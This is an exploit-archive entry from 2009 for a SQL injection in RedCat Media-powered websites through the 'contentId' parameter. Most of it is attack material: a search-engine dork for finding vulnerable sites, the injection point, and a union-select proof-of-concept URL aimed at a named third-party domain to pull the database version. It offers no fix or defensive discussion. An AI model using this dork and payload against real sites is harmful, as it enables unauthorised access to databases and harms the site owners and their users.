redcat media SQL Injection

2009-10-02T00:00:00
ID 1337DAY-ID-9873
Type zdt
Reporter s4va
Modified 2009-10-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================
redcat media SQL Injection
==========================

| Title            : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor           : http://www.redcatmedia.co.uk/
| Date             : 2 oktober 2009 ( Indonesia )
| Author           : s4va
 
[x]==========================================[x]
 
| Dork : "Powered by RedCat" inurl:index.php?contentId=
 
[x]==========================================[x]
 
| Exploit
| http://target/index.php?contentId=[sql]
 
[x]==========================================[x]
 
| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
 
[x]==========================================[x]



#  0day.today [2018-01-01]  #